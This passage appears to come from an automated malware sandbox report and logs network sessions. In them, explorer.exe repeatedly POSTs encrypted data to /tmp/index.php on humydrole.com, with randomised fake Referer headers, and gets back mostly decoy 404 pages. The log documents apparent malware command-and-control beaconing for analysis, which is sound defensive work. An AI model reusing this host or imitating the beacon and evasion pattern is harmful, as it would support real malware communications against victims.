ca 37 19 fe 1f f2 5d c6 58 9b 71 51 34 e0 ea c0 bf 9c 24 e6 77 6c 8a b2 78 29 f8 57 66 02 75 dc 8c b3 5d 51 e4 b2 b4 bc 48 f5 7c d1 5c 91 8c d9 a9 12 a9 5a c5 ed 79 af e5 83 65 53 1f b5 2b d7 e9 c4 c8 81 0e cb 63 8c 20 c7 fc 4e fa 3d d6 55 5a a6 4f ca bc 9a 5a b9 f1 69 9a aa 4a ca 06 b1 4a 39 95 0c e4 e9 06 82 7e 5d ba 06 fd aa 42 bf 08 4c a9 58 97 b5 31 7f 00 1e cf 5a 3b 83 b7 f6 35 6e b0 74 0f ab 61 ec ed 49 f9 fc 37 b9 52 78 f2 fc bd 62 85
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4C1WYo6~u`8F%[,_nwhC[(%[P/I(m?(xHorKE` hX_)%UJ'uHhfT4ucG.;kN]DTkAT<g<d(uqIL&R6oTEK5?)%/Wifx%8#JS4y8{{Iwo'4b3`v)4K-Am9-hdegAiOL<0#j{f@x3P S*#4uF%WYlGiB+m{9<6Ec&D_Qgx#Gh9;uiDiE@Q%#&m=l$m;9_&Hdp>j"-}+v#`d@[~Dm6yA%&^K5O|=IWmH|H?zXU{1[Xp{3Ft2zMU,}Qgjs`.]i|%MMBBoN2<eygU53+nMJ)M=bmXt<$IN;@(Um*7QT~}5iXH^o%pTTi_)MOcI*z?OF6Llc,>ayL'Yl/ki7]XqQ4$wlx)Wfu]QH|\ZyeS+c N=UZOZiJJ9~]BLX1Z;5ntaI7Rxb
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.092633009 CET228INData Raw: 86 25 2d 20 34 5e 17 0a 19 dd b3 f8 5d d0 cf 0f 81 14 f4 0f ba db 45 6b a7 38 58 b2 24 17 29 15 e2 78 cc b4 cf f5 5a 37 1f a7 10 18 53 ce c9 68 18 fa 24 1a 0f 46 93 c1 78 ec b1 90 10 3a 0c c3 24 26 ce 20 26 71 12 f4 4b b6 20 3c 5a 7e db ee 78 8a
                                                                                                                                                                                                                                                                                                                                Data Ascii: %- 4^]Ek8X$)xZ7Sh$Fx:$& &qK <Z~xp4pFtV)o8&7jX`O\]u:ts0"\_uzr}^Q^XQlusG\Rc+bG+w0_rOd0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                136192.168.2.456100180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.476183891 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://jeykdtwfgybrmka.com/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.476234913 CET222OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 3d 53 d4 bb
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vu=SDNbro~;A0F8w^F<4d(B6T~1XO)Ic=Q$F|pUo5
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:32.471452951 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                137192.168.2.456101180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:32.813396931 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://tqeynfegrlvxptk.org/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 269
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:32.813466072 CET269OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 76 55 cf ae
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vuvUp WN]^"j])bgsn3`i\4Q= Q@!^alZ%6.1|I(sMRu2/J/e$C|
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:33.809638023 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:33 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                138192.168.2.456102180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:34.142262936 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://lhsemqpgtljiqh.org/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:34.142293930 CET203OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 78 2d fc e7
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vux-M9D[zLiD4p#f:;e{Q:!$PvXCX)+ZDEz)$pq^6
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:35.143553972 CET238INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:34 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                139192.168.2.456103180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:35.521215916 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://dglifrlqooic.org/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 341
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:35.521313906 CET341OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 34 54 db 9c
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vu4TMemPX~@VkbZKGd0'^[oU/EbH^1m+OLB$r1$6oL!2#>-hVoM<kqz@,
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:36.545105934 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:36 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                140192.168.2.456104180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:36.918273926 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://eaadevesuhql.com/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 273
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:36.918325901 CET273OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 66 53 fc be
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vufSdG~C>o5hHj[v4R4sf:;O]3 \,PMD^<b;`Zl2n*sFca^b{+.
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:37.921222925 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:37 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                141192.168.2.456105180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:38.253411055 CET287OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://gnxrixcpqaqlfxho.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 288
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:38.253411055 CET288OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 2d 31 ab fb
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vu-1Z"Me^Zf9,>/y!xC*P_<Y*%L=Ysz_I$=`v~s<CUi<!fevm\Koi~#,PS
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:39.265647888 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:38 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                142192.168.2.456106180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:39.628154993 CET287OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://vuhmtmvivujqrlex.com/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:39.628333092 CET118OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 22 59 b6 8c
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vu"YXAj[[ ^x[@[e7[
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:40.633784056 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:40 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
